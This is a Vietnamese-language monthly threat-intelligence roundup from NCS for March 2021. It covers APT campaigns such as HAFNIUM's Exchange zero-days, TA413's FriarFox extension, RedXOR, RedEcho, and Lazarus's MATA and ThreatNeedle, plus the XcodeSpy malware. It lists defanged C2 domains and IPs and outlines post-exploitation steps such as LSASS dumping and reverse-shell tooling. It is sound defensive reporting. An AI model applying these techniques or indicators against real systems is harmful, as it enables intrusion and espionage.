Thông tin các mối đe dọa bảo mật trong tháng 03 – 2021

 

Hàng tháng, Chúng tôi – NCS tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.

 

 

1     Các mối đe dọa nâng cao – Advanced Threats

1.1     Nhóm TA413 của Trung Quốc sử dụng tiện ích mở rộng của Firefox trong một chiến dịch gián điệp mạng nhắm vào người Tây Tạng

Một số tổ chức có trụ sở tại Tây Tạng (Trung Quốc) mới đây đã trở thành mục tiêu trong chiến dịch gián điệp mạng quy mô lớn được bởi triển khai bởi một nhóm tin tặc được hậu thuẫn, bằng cách sử dụng một tiện ích mở rộng độc hại trên trình duyệt Firefox. Tiện ích mở rộng này được thiết kế để chiếm đoạt tài khoản Gmail và lây nhiễm phần mềm độc hại trên hệ thống của nạn nhân.

Điều tra ban đầu cho thấy chiến dịch tấn công này được tiến hành bởi một nhóm hacker có liên hệ tương đối mật thiết với Trung Quốc – TA413. Các hoạt động điều phối đã bắt đầu từ tháng Giêng và tiếp tục trong suốt tháng Hai, theo một báo cáo của Proofpoint.

Đáng chú ý, chiến dịch độc hại này có sự góp mặt của Scanbox, mã độc nổi tiếng với khả năng gián điệp thông tin, từng được sử dụng bởi nhóm OceanLotusScanbox có thể cho phép các tác nhân độc hại thu thập chính xác dữ liệu của mục tiêu, đồng thời ghi lại cả các lần gõ phím của họ.

Giai đoạn xâm nhập và khai thác

Theo phát hiện của Proofpoint, các email lừa đảo do kẻ tấn công (TA413) gửi đến hộp thư của mục tiêu sẽ chuyển hướng họ đến miền “you-tube[.]tv” do chính chúng kiểm soát. Miền này sau đó lại được hiển thị ngụy trang dưới dạng trang đích Adobe Flash Player Update giả mạo.

Các tập lệnh cấu hình JavaScript được thực thi từ miền này sẽ tự động nhắc các mục tiêu cài đặt tiện ích bổ sung độc hại có tên FriarFox nếu họ đang sử dụng trình duyệt web Firefox và đăng nhập vào tài khoản Gmail.

Nếu mục tiêu sử dụng bất kỳ trình duyệt web nào khác (không phải Firefox), họ sẽ được chuyển hướng đến trang đăng nhập YouTube hợp pháp. Nếu đang sử dụng Firefox nhưng chưa đăng nhập vào tài khoản Gmail, họ sẽ được yêu cầu bổ sung thêm tiện ích FriarFox độc hại này vào trình duyệt của mình.

Quy trình tấn công

Tiện ích mở rộng độc hại FriarFox

FriarFox được phát triển dựa trên tiện ích mở rộng mã nguồn mở hợp pháp Gmail Notifier của Firefox, bằng cách thay đổi biểu tượng và mô tả siêu dữ liệu của nó để bắt chước quy trình cập nhật Flash. Ngoài ra, FriarFox cũng được đính kèm (theo cách có chủ đích) các JavaScripts độc hại được thiết kế để chiếm đoạt tài khoản Gmail của nạn nhân và lây nhiễm phần mềm độc hại Scanbox vào hệ thống của họ.

Công cụ Gmail Notifier (restartless) trong cửa hàng ADD-ON của FireFox

Khi nạn nhân bị lừa cài đặt tiện ích mở rộng FriarFox, các tác nhân độc hại TA413 sẽ chiếm tài khoản Gmail và dùng trình duyệt Firefox của nạn nhân để thực hiện các hành động độc hại sau:

  • Tìm kiếm email
  • Đọc email
  • Thay đổi các tính năng cảnh báo bằng âm thanh và hình ảnh của trình duyệt Firefox cho tiện ích mở rộng FriarFox
  • Gắn nhãn email
  • Đánh dấu email là thư rác
  • Xóa tin nhắn
  • Chuyển tiếp email
  • Xóa thư khỏi thùng rác Gmail
  • Gửi mail từ tài khoản bị xâm phạm

“Việc sử dụng các tiện ích mở rộng trình duyệt để nhắm mục tiêu đến tài khoản Gmail riêng tư của người dùng kết hợp với hoạt động phân phối phần mềm độc hại Scanbox chứng tỏ kinh nghiệm và tay nghề cao của TA413”, Proofpoint kết luận.

1.2    LazyScripter – Một nhóm APT mới được đặt tên

Các nhà phân tích của trung tâm Threat Intelligence tại Malwarebytes liên tục nghiên cứu và theo dõi các chiến dịch phần mềm độc hại đang hoạt động và các nhóm tác nhân khi mức độ phổ biến và tinh vi của các cuộc tấn công có chủ đích ngày càng phát triển nhanh chóng. Họ giới thiệu một nhóm APT mới, tác nhân mới này lấy tên là LazyScripter và hoạt động từ năm 2018, sử dụng phương thức lừa đảo phishing để nhắm mục tiêu vào các cá nhân tìm kiếm việc nhập cư vào Canada, các hãng hàng không và Hiệp hội Vận tải Hàng không Quốc tế – International Air Transport Association (IATA). Cơ sở hạ tầng hỗ trợ chiến dịch dài hạn này vẫn đang hoạt động và nhóm tấn công tiếp tục phát triển bằng các cập nhật bộ công cụ của họ.

LazyScripter sử dụng các dự án mã nguồn mở

Hoạt động mới nhất của LazyScripter liên quan đến việc sử dụng hai loại mã độc có tên là Octopus và Koadic, đây là hai mã độc có sẵn, miễn phí. Cả hai đều được gửi thông qua các tài liệu độc hại và tập tin nén ZIP có chứa các đối tượng nhúng (các file batch hoặc VBScript) không phải là các đoạn mã macro thường thấy trong các cuộc tấn công phishing. Nói thêm về đối tượng nhúng, đây là các đối tượng được tạo riêng biệt trước và sau đó được đặt vào một đối tượng cha hoặc một chương trình, đối tượng nhúng có thể làm việc độc lập mặc dù nó được lưu trữ vật lý bên trong đối tượng cha.

Theo các nhà nghiên cứu, LazyScripter đã chuyển chiến thuật từ khai thác backdoor sử dụng công cụ PowerShell Empire sang chiến thuật sử dụng trojan truy cập từ xa (RAT). Các nhà nghiên cứu đã đặt tên cho các payload của 2 chiến thuật trên lần lượt là Empoder và KOCTOPUS. Trong đa số các trường hợp được quan sát, các tài liệu độc hại đi kèm với một hoặc hai đối tượng nhúng, sử dụng các biểu tượng (icon) giả mạo tệp PDF, Microsoft Word/Excel; trên thực tế, chúng là các biến thể của loader Empoder và KOCTOPUS. Các đối tượng nhúng này có thể là file batch, file thực thi hoặc VBScript.

Quy trình tổng thể của KOCTOPUS

Lưu trữ công cụ trên GitHub

Điều thú vị là LazyScripter đã lưu trữ các bộ công cụ của họ trên GitHub, đây là chiến thuật đã được sử dụng trong quá khứ bởi một nhóm APT có liên kết với Iran. Malwarebytes đã tìm thấy 3 tài khoản GitHub liên quan tới LazyScripter, hai trong số đó – LIZySARA và Axella49 – đã bị xóa bỏ trong tháng 1, tài khoản thứ ba (OB2021) mới xuất hiện vào đầu tháng 2 và tính đến nay vẫn đang hoạt động.

Dưới đây là dòng thời gian về hoạt động lừa đảo của LazyScripter dựa trên nhiều mồi câu khác nhau mà chúng đã sử dụng:

1.3    Phát hiện mã độc Linux mới có liên quan đến tin tặc Trung Quốc

Các chuyên gia bảo mật tại công ty an ninh mạng Intezer vừa phát hiện một backdoor (cửa hậu) mới với cấu trúc phức tạp, chuyên nhắm mục tiêu vào các thiết bị đầu cuối và máy chủ Linux. Một số bằng chứng cho thấy mã độc Linux này có thể là ‘tác phẩm’ của một nhóm tin tặc được chính phủ Trung Quốc hậu thuẫn.

Được đặt tên là ‘RedXOR’, backdoor mới giả dạng bộ công cụ polkit daemon, có một số điểm tương đồng với những phần mềm trước đây từng có liên quan với nhóm tin tặc Winnti Umbrella, điển hình là PWNLNX, XOR.DDOS và Groundhog.

Một số điểm tương đồng được các nhà nghiên cứu bảo mật phát hiện khi so sánh những dòng phần mềm độc hại trên gồm:

  • Sử dụng rootkit mã nguồn mở cũ
  • Các chức năng được đặt tên giống hệt nhau
  • Lưu lượng truy cập độc hại được mã hóa XOR
  • Lược đồ đặt tên có thể so sánh cho các dịch vụ bền bỉ
  • Biên dịch bằng cách sử dụng các trình biên dịch Red Hat kế thừa
  • Dòng mã và chức năng rất giống nhau…

Winnti Umbrella là tên gọi ám chỉ tập hợp một số nhóm tịn tặc được chính phủ Trung Quốc hậu thuẫn, gồm BARIUM, APT41,  Blackfly, Suckfly, Wicked Panda. Toàn bộ đều có liên quan đến lợi ích của chính quyền Bắc Kinh. Những nhóm APT kể trên cùng chia sẻ một kho công cụ độc hại được sử dụng trong các cuộc tấn công gián điệp mạng, có động cơ tài chính từ ít nhất là năm 2011.

Tên ‘RedXOR’ xuất phát từ hành vi mã hóa dữ liệu mạng bằng lược đồ, dựa trên XOR và được biên dịch bằng trình biên dịch GCC trên bản phát hành cũ của Red Hat Enterprise Linux. Điều đó cho thấy mã độc được sử dụng trong các cuộc tấn công có chủ đích nhằm vào hệ thống Linux cũ.

Theo các nhà nghiên cứu tại Intezer, có hai mẫu phần mềm độc hại được tải lên từ Indonesia và Đài Loan vào khoảng ngày 23-24/2. Cả hai nước này đều từng bị các nhóm tin tặc có trụ sở tại Trung Quốc nhắm mục tiêu tấn công.

Ngoài sự trùng lặp trong quy trình, chức năng tổng thể cũng như việc sử dụng mã hóa XOR giữa RedXOR và PWNLNX, backdoor có dạng tập tin 64-bit ELF (‘po1kitd-update-k’) khi thực thi sẽ tạo một thư mục ẩn để lưu trữ các tập tin liên quan trước khi tự cài đặt vào máy. Polkit (hay PolicyKit) là bộ công cụ chuyên xác định, xử lý việc ủy quyền và thường được sử dụng để cho phép những quy trình không có đặc quyền giao tiếp với các quy trình đặc quyền.

Ngoài ra, phần mềm độc hại còn đi kèm với một cấu hình mã hóa chứa địa chỉ IP và cổng kết nối hệ thống máy chủ điều khiển C&C, cùng với mật khẩu cần xác thực máy chủ C&C trước khi thiết lập kết nối qua ổ cắm TCP.

Hơn nữa, toàn bộ thông tin liên lạc không chỉ được ngụy trang dưới dạng lưu lượng HTTP vô hại mà còn được mã hóa hai chiều bằng cách sử dụng lược đồ mã hóa XOR. Kết quả được giải mã sẽ tiết lộ chính xác lệnh sẽ chạy.

RedXOR có rất nhiều tính năng khả dụng, gồm thu thập thông tin hệ thống (địa chỉ MAC, tên người dùng, bản phân phối, xung nhịp CPU, phiên bản kernel…), quản lý tập tin trên các hộp Linux bị nhiễm, ẩn quy trình bằng rootkit mã nguồn mở Adore-ng, thực thi các lệnh với đặc quyền hệ thống, ủy quyền lưu lượng độc hại, chạy những lệnh shell tùy ý, kể cả các tùy chọn cập nhật từ xa.

Nạn nhân bị ảnh hưởng bởi mã độc RedXOR có thể thực hiện các biện pháp bảo vệ bằng cách chấm dứt quá trình hoạt động và xóa tất cả các tập tin có liên quan đến phần mềm độc hại này.

1.4    Chiến dịch tấn công của RedEcho nhắm vào ngành điện lực Ấn Độ

Nhóm nghiên cứu Insikt Group thuộc Recorded Future đã phát hiện ra một loạt các cuộc xâm nhập có mục tiêu là ngành điện lực của Ấn Độ bắt đầu từ giữa năm 2020. Các cuộc xâm nhập này được thực hiện bởi một nhóm tấn công liên quan tới Trung Quốc có tên là RedEcho. Nhóm tấn công thiên về sử dụng AXIOMATICASYMPTOTE – một thuật ngữ được dùng để chỉ các máy chủ C2 bao gồm ShadowPad C2s, được dùng chung bởi một số nhóm tấn công của Trung Quốc như APT41/Barium, Tonto Team, Icefog, KeyBoy,  Tick.

Mô hình “kim cương” của chiến dịch (Nguồn: Recorded Future)

RedEcho Infrastructure TTPs

Một tập hợp con của các máy chủ C2 AXIOMATICASYMPTOTE đã được thiết lập dựa trên việc giả mạo domain của các công ty sản xuất và truyền tải điện ở Ấn Độ. Ví dụ domain ntpc-co[.]com giả mạo domain của Tổng Công ty TNHH Nhiệt điện quốc gia Ấn Độ – có domain chính thức là ntpc[.]com. Domain giả mạo được đăng kí lần đầu tiên vào tháng 7 năm 2019.

Bên cạnh đó Insikt Group đã xác định cách hoạt động của RedEcho trong chiến dịch này, có thể được tóm tắt như sau:

  • Các domains được đăng kí thông qua công ty đăng ký tên miền WEBCC và sử dụng một máy chủ tên miền có thẩm quyền nhưng không phổ biến đó là eznowdns[.]com.
  • Infrastructure của RedEcho có liên quan đến Đại lý cung cấp tên miền và cơ sở hạ tầng CN DNS ở Trung Quốc đó là cndns[.]com.
  • Các domain đã sử dụng dịch vụ bảo vệ quyền riêng tư WhoisProtection của WHOIS.
  • Infrastructure AXIOMATICASYMPTOTE được lưu trữ trên HKBN Enterprise Solutions HK Limited (AS9381) và EHOSTICT (AS45382).
  • Các domain độc hại giả mạo tên các công ty của ngành điện lực Ấn Độ hoặc giả mạo các ký tự đặc trưng liên quan đến Ấn Độ.
  • Sử dụng top level domain là .com
  • Sử dụng DNS động.

Nạn nhân của RedEcho

Recorded Future đã xác định được mục tiêu của chiến dịch là 21 địa chỉ IP của 10 tổ chức khác nhau trong ngành sản xuất và truyền tải điện của Ấn Độ và 2 tổ chức khác trong lĩnh vực hàng hải. Lưu ý rằng, tất cả 12 tổ chức nói trên được Trung tâm Bảo vệ cơ sở hạ tầng thông tin quan trọng quốc gia Ấn Độ (NCIIPC) xếp vào nhóm các cơ sở hạ tầng quan trọng.

Ngành điện lực Ấn Độ bị nghi ngờ là nạn nhân của các cuộc xâm nhập có chủ đích của RedEcho (Nguồn: Recorded Future)

RedEcho Attribution

Có ít nhất 3 trong số các địa chỉ IP mục tiêu ở Ấn Độ trước đây đã được quan sát thấy trong một chiến dịch được nghi ngờ có liên quan đến nhóm APT41/Barium, nhắm vào ngành dầu khí của Ấn Độ vào tháng 11 năm 2020.

Hơn nữa, Recorded Future theo dõi thấy có sự giao tiếp qua lại giữa số lượng lớn các địa chỉ IP ở Ấn Độ (là mục tiêu của RedEcho) với 2 máy chủ AXIOMATICASYMPTOTE là 91.204.224[.]14 và 91.204.225[.]216 (máy chủ lưu trữ nhiều domain DNS động). Hoạt động này được ghi nhận là trùng lặp với hoạt động của APT41/Barium đã được Microsoft báo cáo trước đây, chẳng hạn như cùng chung domain bguha.serveuser[.]com và railway.sytes[.]net. Mặc dù có một số điểm tương đồng giữa chiến dịch này và hoạt động của APT41/Barium và Tonto Team nhưng điều này vẫn chưa đủ tin cậy để xác định chiến dịch nhắm vào ngành điện lực của Ấn Độ lần này do 2 nhóm nói trên thực hiện.

Ngoài ra, Recorded Future cũng dự báo Trung Quốc có thể sẽ tiếp tục gây ảnh hưởng lên các quốc gia khác, đặc biệt là những quốc gia nằm trong phạm vi ảnh hưởng của chương trình đầu tư BRI của Trung Quốc, việc gia tăng các hoạt động trên không gian mạng có thể giúp Trung Quốc tăng lợi thế chiến lược.

1.5    HAFNIUM tấn công vào máy chủ Email Exchange bằng nhiều lỗ hổng 0-day

Đầu tháng 3/2021, Microsoft cho biết đã phát hiện các tấn công có chủ đích nhằm khai thác lỗ hổng 0-day nhắm vào máy chủ Micorosoft Exchange hoạt động trong các tổ chức.

Theo ghi nhận, tin tặc đã khai thác các lỗ hổng 0-day truy cập vào máy chủ thư Exchange để truy cập vào các tài khoản email và cài đặt phần mềm độc hại nhằm duy trì truy cập lâu dài trên hệ thống của nạn nhân. Trung tâm tri thức an ninh mạng của Microsoft (Microsoft Threat Intelligence Center – MSTIC) đã dựa trên thông tin về các nạn nhân, chiến thuật và quy trình tấn công nhận định vụ việc liên quan tới nhóm tin tặc HAFNIUM, được cho là có liên quan đến chính phủ Trung Quốc. Các lỗ hổng đang được khai thác gần đây gồm CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 và CVE-2021-27065. Các lỗ hổng này ảnh hưởng trực tiếp đến các phiên bản Microsoft Exchange Server 2013/2016/2019, cho phép đối tượng tấn công truy cập vào máy chủ hệ thống, chèn và thực thi mã từ xa (Chi tiết về các lỗ hổng xem thêm ở phần CVE).

Về tổ chức HAFNIUM

HAFNIUM chủ yếu nhắm đến các mục tiêu ở Mỹ như các lĩnh vực công nghiệp, bao gồm các nhà nghiên cứu bệnh truyền nhiễm, công ty luật, cơ sở giáo dục đại học, nhà thầu quốc phòng, các tổ chức tư vấn chính sách và các tổ chức phi Chính phủ.

HAFNIUM đã từng xâm nhập vào các hệ thống của nạn nhân bằng cách khai thác lỗ hổng trong các máy chủ có kết nối Internet và sử dụng các nền tảng mã nguồn mở hợp lệ như Covenant để ra lệnh thực thi và kiểm soát. Một khi đã có quyền truy cập vào hệ thống của nạn, HAFNIUM thường tải dữ liệu lên các website chia sẻ như MEGA.

Kỹ thuật tấn công

Sau khi khai thác các lỗ hổng này để có được quyền truy cập ban đầu, nhóm tin tặc HAFNIUM đã triển khai các web shell lên máy chủ bị xâm nhập. Các web shell này cho phép tin tặc đánh cắp dữ liệu và thực hiện một số hành động nguy hại để xâm nhập sâu hơn.

Dưới đây là một ví dụ về web shell được triển khai bởi HAFNIUM, được viết bằng ASP:

Sau khi triển khai web shell, kẻ tấn công đã thực hiện các hành động khai thác sau:

  • Sử dụng Procdump để trích xuất tiến trình bộ nhớ LSASS

  • Sử dụng 7-Zip để nén các dữ liệu đã thu thập được nhằm đánh cắp thông tin

  • Sử dụng Exchange Powershell snap-ins để trích xuất dữ liệu mailbox

  • Sử dụng Nishang Invoke-PowerShellTcpOneline để dịch ngược shell

  • Tải về PowerCat từ Github để mở kết nối tới máy chủ từ xa

Ngoài ra, HAFNIUM có thể tải về danh bạ Exchange offline từ các hệ thống bị xâm nhập, bao gồm các thông tin về nạn nhân đó và bạn bè của họ.

Trung tâm giám sát an ninh mạng (SOC) NCS ghi nhận, trước khi Microsoft công bố thông tin về lỗ hổng nêu trên, tại Việt Nam đã xuất hiện những hành vi bất thường trên hệ thống Exchange Server của hàng loạt tổ chức, doanh nghiệp tại Việt Nam. NCS đã tập trung điều tra, làm rõ luồng tấn công, phân tích cụ thể các hành vi bất thường, từ đó sớm nhận định đây là cuộc tấn công có chủ đích APT nhưng với cách thức và kỹ thuật hoàn toàn mới, không giống với bất kỳ cuộc tấn công nào đã được công bố trên thế giới trước đó mà dựa vào khai thác lỗ hổng zero-day. NCS đã nhanh chóng hỗ trợ nhiều tổ chức, doanh nghiệp cô lập, loại trừ, sau đó giải mã cuộc tấn công trước khi các thông tin chính thức được công bố tại Mỹ.

Dòng thời gian theo dõi diễn biến của chiến dịch tấn công MS Exchange Server

Thời điểm Sự kiện Nguồn
Tháng 12/2020 DevCore, một công ty bảo mật nhỏ có trụ sở tại Đài Loan cho biết họ đã tìm thấy các lỗi ảnh hưởng đến phần mềm email doanh nghiệp Exchange của Microsoft được sử dụng rộng rãi. Sau đó vào cuối tháng 2 năm 2021, Microsoft thông báo cho DevCore rằng họ sắp phát hành các bản vá bảo mật để khắc phục sự cố. Bloomberg (updated 13/3/2021)
Tháng 01/2021 Các cuộc tấn công được phát hiện lần đầu tiên nhưng không được tiết lộ công khai:

· Volexity: Phát hiện ra hoạt động bất thường từ 02 trong số các máy chủ MS Exchange của khách hàng.

· Mandiant from FireEye: Quan sát thấy nhiều trường hợp xâm nhập vào MS Exchange Server trong môi trường của ít nhất 01 khách hàng. Hành động quan sát thấy bao gồm: tạo web shell, thực thi mã từ xa và thu thập thông tin về các giải pháp bảo mật đang được sử dụng tại endpoints.

· Veloxity (updated 02/3/2021)

· FireEye (updated 04/3/2021)

Thứ ba, 02/3/2021 Microsoft:

· Cáo buộc kẻ tấn công là HAFNIUM, tổ chức do nhà nước Trung Quốc bảo trợ.

· Tung ra các bản vá bảo mật cho Exchange Server

· Microsoft (updated 08/3/2021)

· Microsoft Security Response Center (updated 12/3/2021)

Thứ tư, 03/3/2021 · CISA: cảnh bảo rằng việc vá lỗi là không đủ, các tổ chức đang sử dụng MS Exchange Server cần kiểm tra lại hệ thống của mình theo TTPs, IOC đã công bố để chủ động phát hiện bất kỳ hoạt động độc hại nào. · CISA (updated 13/3/2021)
Thứ sáu, 05/3/2121 Microsoft:

· Việc update bản vá là không đủ, khuyến nghị khách hàng điều tra số hệ thống MS Exchange bằng biện pháp threat hunting để đảm bảo hệ thống của mình không bị tấn công.

· Chia sẻ một tập lệnh nmap để giúp khách hàng trích xuất ra các máy chủ dễ bị tấn công trong cơ sở hạ tầng của họ.

· Microsoft (updated 08/3/2021)

· Microsoft Exchange Server Vulnerabilities Mitigations (updated March 15, 2021)

Thứ bảy. 06/3/2021 Chiến dịch có thế đã ảnh hưởng đến hàng chục nghìn doanh nghiệp, văn phòng chính phủ và trường học ở Mỹ (nguồn tin do The Wall Street Journal con số lên tới 250.000 tổ chức) The Wall Street Journal (updated 06/3/2021)
Chủ nhật, 07/3/2021 · Tin tặc đã tấn công máy chủ MS Exchange tại cơ quan ngân hàng Châu Âu.

· Microsoft phát hành một script để scan MS Exchange logs nhằm tìm ra các IOCs liên quan đến lỗ hổng.

· European Banking Authority (updated 07/3/2021)

· Microsoft (updated 07/3/2021)

Thứ tư, 10/3/2021 · ESET cho rằng hơn 10 nhóm APT khác nhau đang khai thác lỗ hổng MS Exchange gần đây để xâm nhập vào các email server, trong đó 5000 email servers đã bị ảnh hưởng.

· FBI và CISA đã ban hành một văn bản mô tả chi tiết, phát hiện mới nhất và các bước giảm thiểu ảnh hưởng của lỗ hổng

· ESET (updated 10/3/2021)

· FBI vs CISA (updated 10/3/2021)

Thứ năm, 11/3/2021 Các tin tặc đòi tiền chuộc đã bắt đầu lợi dụng lỗ hổng này để phát tán ransomware có tên Win32/DoejoCrypt.A phát hiện bởi Microsoft. Microsoft (updated 11/3/2021)
Thứ sáu, 12/3/2021 · Liên tiếp các cuộc tấn công Exchange sử dụng Ransomware: Kryptos Logic đã phát hiện ra 6970 web shells liên quan đển lỗ hổng MS Exchange. Các web shell này đang được sử dụng để triển khai ransomware.

· DearCry là một biến thể ransomware mới, khai thác các lỗ hổng tương tự trong Micosoft Exchange, do HAFNIUM tiến hành. Nó tạo ra các bản sao được mã hóa của các tệp bị tấn công và xóa các bản gốc.

· Kryptos Logic (updated 12/3/2021).

· Sophos (updated 12/3/2021).

 

Thứ bảy, 13/3/2021 CISA xuất bản 07 báo cáo phân tích mã độc Exchange (MARs). Mỗi báo cáo xác định một webshell liên quan đến việc khai thác các lỗ hổng trong sản phẩm MS Exchange Server. CISA (updated 13/3/2021)

 

1.6    Nhóm tấn công APT Lazarus sử dụng khung MATA nhằm phát tán phần mềm độc hại TFlower và sử dụng mã độc ThreatNeedle nhắm vào ngành công nghiệp quốc phòng.

1.6.1    Sử dụng khung MATA nhằm phát tán phần mềm độc hại TFlower

Lazarus là nhóm tấn công APT được xác định là của Triều Tiên, trong những năm gần đây liên tục bị cáo buộc liên quan đến hành vi trộm cắp tài chính và tống tiền, bao gồm âm mưu phát tán mã độc WannaCry và cuộc tấn công mạng vào SonyPictures. Một thành phần kỹ thuật quan trọng liên quan đến Lazarus là khung mã độc MATA, một khung phần mềm độc hại đa nền tảng nâng cao, được Kaspersky báo cáo vào ngày 22/7/2020 và trước đó vào ngày 19/12/2019 được Netlab báo cáo.

SYGNIA gần đây trong điều tra của mình đã phát hiện một cuộc tấn công kép: mã độc tống tiền, trong đó kẻ tấn công sử dụng một biến thể của MATA để phân phối mã độc sau đó thực thi mã độc tống tiền có tên TFlower. Các chuyên gia của SYGNIA nghi ngờ rằng có sự liên quan giữa Lazarus và TFlower, họ đưa ra một số kết luận như sau:

  • MATA đã được tận dụng để triển khai ransomware TFlower;
  • MATA đang hoạt động và lan rộng (kể từ tháng 5 năm 2019 các nhóm tấn công sử dụng MATA đã liên tục sử dụng các máy chủ mới, với hơn 150 IP được kết nối với C&C của MATA, máy chủ C&C mới nhất được xác định vào ngày 4/2/2020);
  • Kẻ tấn công có kỹ năng cao và thực hiện các kỹ thuật né tránh sự phát hiện của hệ thống (trong suốt cuộc tấn công, MATA được sử dụng để xóa dấu vết một cách có hệ thống và cố gắng không bị phát hiện bằng cách giả mạo các sản phẩm bảo mật).

MATA bao gồm 3 file thành phần: .exe, .dll, .dat được triển khai trong thư mục:  “C: \ Windows \ System32”. Lưu ý rằng, đối với mỗi máy chủ nhiễm mã độc, các file độc hại sẽ có một mã băm duy nhất, không trùng với máy chủ khác.

Luồng thực thi của chiến dịch

TFlower là mã độc tống tiền đã được một số tổ chức đưa tin từ tháng 9 đến tháng 11 năm 2019. Tuy nhiên, kể từ đó, rất ít thông tin được công khai về hoạt động của nó. Trong phân tích của SYGNIA, kẻ tấn công đã xóa dấu vết của ransomware, tuy nhiên thông qua pháp y số đã xác định một số thông số kỹ thuật cho thấy đây là TFlower với độ chắc chắn cao, ngoài ra còn xác định được chính backdoor MATA là kênh truyền của ransomware này. Điều này làm dấy lên khả năng nhóm tấn công Lazarus là tác nhân đứng sau TFlower Group hoặc có hợp tác với TFlower Group trong chiến dịch này.

1.6.2   Nhắm vào ngành công nghiệp quốc phòng với mã độc ThreatNeedle

Một nghiên cứu mới đã tiết lộ rằng một nhóm APT của Triều Tiên có tên là Lazarus đứng sau một chiến dịch lừa đảo trực tuyến nhằm đánh cắp dữ liệu quan trọng từ các công ty quốc phòng bằng cách tận dụng một phần mềm độc hại tiên tiến có tên là ThreatNeedle. Theo Kaspersky, chiến dịch gián điệp mạng phức tạp và đang diễn ra đã sử dụng các email có chủ đề COVID-19 được kết hợp với thông tin cá nhân công khai của các nạn nhân để thu hút và làm mồi nhử nhằm phát tán mã độc hại.

Email phishing có liên kết với tài liệu độc hại

Các email lừa đảo được soạn thảo cẩn thận và được viết thay mặt cho một trung tâm y tế thuộc tổ chức đang bị tấn công. Để đảm bảo email có vẻ xác thực, những kẻ tấn công đã đăng ký tài khoản với dịch vụ email công cộng để đảm bảo địa chỉ email của người gửi trông giống với địa chỉ email thực của trung tâm y tế và sử dụng dữ liệu cá nhân của phó bác sĩ trung tâm y tế của tổ chức bị tấn công trong email. Payload của cuộc tấn công đã được che giấu trong một macro của tài liệu Microsoft Word được đính kèm với email.

Quy trình lây nhiễm

Sau khi được triển khai, ThreatNeedle drops ra ba giai đoạn trong quá trình thực thi, bao gôm trình cài đặt, trình tải và cửa hậu có khả năng thao tác với file và thư mục, lập hồ sơ hệ thống, kiểm soát các tiến trình cửa hậu và thực hiện các lệnh đã nhận, cùng các khả năng khác. Sau khi những kẻ tấn công xâm nhập vào một hệ thống, chúng tiến hành thu thập thông tin đăng nhập bằng một công cụ có tên là Responder và sau đó di chuyển sang các máy khác cùng mạng với máy nạn nhân để tìm kiếm “tài sản quan trọng”, theo các nhà nghiên cứu.

Kẻ tấn công cũng đã tìm ra cách để vượt qua sự cô lập trong mạng bằng cách giành quyền truy cập vào một máy định tuyến nội bộ và định cấu hình nó như một máy chủ proxy, cho phép chúng lấy dữ liệu bị đánh cắp khỏi mạng nội bộ bằng một công cụ tùy chỉnh và sau đó gửi nó đến máy chủ C&C của chúng.

2    Malware

Mã độc XcodeSpy tấn công vào những nhà phát triển Xcode với EggShell backdoor

Tóm tắt nội dung:

–      Tin tặc lợi dụng chức năng Run Script của Apple’Xcode IDE để tấn công các nhà phát triển trên Apple qua tệp chia sẻ Xcode Project.

–      XcodeSpy là một Xcode project độc hại để cài đặt một biến thê tùy chỉnh của EggShell backdoor trên máy macOS của nhà phát triển phần mềm và nó đóng vai trò như một cơ chế để duy trì sự kiểm soát trên máy nạn nhân.

–      Backdoor có chức năng ghi lại microphone, camera, bàn phím, upload, download file trên máy nạn nhân.

–      Con đường lây nhiễm bằng Xcode có thể được sử dụng bởi nhiều nhóm tấn công khác. Vậy nên tất cả các nhà phát triển sử dụng Xcode cần phải cẩn trọng khi sử dụng các tệp Xcode project.

Tổng quan

Trong năm nay xuất hiện hai xu hướng tấn công mới đáng lo ngại là nhắm mục tiêu vào các nhà phát triển và sử dụng các cuộc tấn công chuỗi cung ứng để lây nhiễm cho nhiều nhóm khách hàng. Nhắm mục tiêu các nhà phát triển phần mềm là bước đầu tiên trong một cuộc tấn công chuỗi cung ứng thành công. Một cách để thực hiện phương thức này là lợi dụng các công cụ phát triển phần mềm quan trọng và phổ biến. Vào tháng 1 năm 2021, Google TAG đã thông báo về việc họ phát hiện ra một chiến dịch của Triều Tiên nhắm vào các nhà nghiên cứu bảo mật và các nhà nghiên cứu lỗ hổng phần mềm. Một trong những phương pháp lây nhiễm là việc chia sẻ một Visual Studio project được thiết kế để tải DLL độc hại. Trong mục này sẽ thảo luận một phương pháp tấn công tương tự nhắm vào các nhà phát triển của Apple thông qua các Xcode project độc hại.

Gần đây, các nhà nghiên cứu tại SentinelLabs đã phát hiện ra một Xcode project đã được trojanized nhắm mục tiêu vào các nhà phát triển iOS nhờ một mẹo từ một nhà nghiên cứu ẩn danh. Malicious project là phiên bản đã được kiểm duyệt của một dự án nguồn mở, hợp lệ có sẵn trên GitHub. Project cung cấp cho các nhà phát triển iOS một số tính năng nâng cao để tạo hiệu ứng cho Thanh tab bar dựa trên sự tương tác với người dùng.

Tuy nhiên, phiên bản XcodeSpy đã được thay đổi một cách tinh vi để thực thi một Run Script bị obfuscate khi project được khởi tạo. Tập lệnh kết nối với C2 của những kẻ tấn công và thả một biến thể của EggShell backdoor trên máy. Phần mềm độc hại này cài đặt một user LaunchAgent để duy trì sự kiểm soát và có thể ghi lại thông tin từ micrô, máy ảnh và bàn phím của nạn nhân.

Các nhà nghiên cứu đã phát hiện ra hai biến thể của payload, backdoor tùy chỉnh chứa một số URL C2 được mã hóa và các chuỗi được mã hóa cho các đường dẫn đến tệp khác nhau. Đặc biệt, một chuỗi mã hóa được chia sẻ giữa Xcode project đã được quản lý và các backdoor được tùy chỉnh, liên kết chúng với nhau như một phần của cùng một chiến dịch ‘XcodeSpy‘.

Tại thời điểm này, nhà nghiên cứu được thông báo về một trường hợp ITW trong một tổ chức của Hoa Kỳ. Các chỉ số từ phân tích của nhà nghiên cứu cho thấy chiến dịch đã hoạt động ít nhất từtháng 7 đến tháng 10 năm 2020 và cũng có thể nhắm mục tiêu đến các nhà phát triển ở Châu Á.

Cho đến nay, nhà nghiên cứu không thể phát hiện ra các mẫu khác của các Xcode project đã được trojanized và không thể đánh giá mức độ của hoạt động này. Tuy nhiên, dựa vào thời gian từ các mẫu đã biết và các đặc điểm khác được đề cập bên dưới cho thấy rằng các chiến dịch XcodeSpy khác có thể tồn tại.

